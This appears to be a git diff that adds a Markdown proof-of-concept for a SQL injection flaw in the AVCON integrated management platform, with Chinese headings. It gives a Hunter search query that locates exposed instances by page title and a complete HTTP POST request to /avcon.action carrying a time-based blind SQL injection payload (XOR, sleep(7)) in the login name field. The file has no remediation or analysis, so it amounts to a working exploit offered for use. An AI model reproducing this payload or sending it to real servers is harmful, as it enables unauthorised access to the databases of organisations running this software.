diff --git a/avcon综合管理平台SQL注入漏洞.md b/avcon综合管理平台SQL注入漏洞.md new file mode 100644 index 0000000..1ee413b --- /dev/null +++ b/avcon综合管理平台SQL注入漏洞.md @@ -0,0 +1,24 @@ +## avcon综合管理平台SQL注入漏洞 + + +## hunter +``` +web.title="AVCON-系统管理平台" +``` + +## poc +``` +POST /avcon.action HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 77 + +name=0'XOR(if(now()=sysdate()%2Csleep(7)%2C0))XOR'Z&password=u]H[ww6KrA9F.x-F +``` +![a9c6cfee7dd8881ea4bf019d82903c04](https://github.com/wy876/POC/assets/139549762/349eafe6-c55e-449f-b6e4-bb01923c07ef)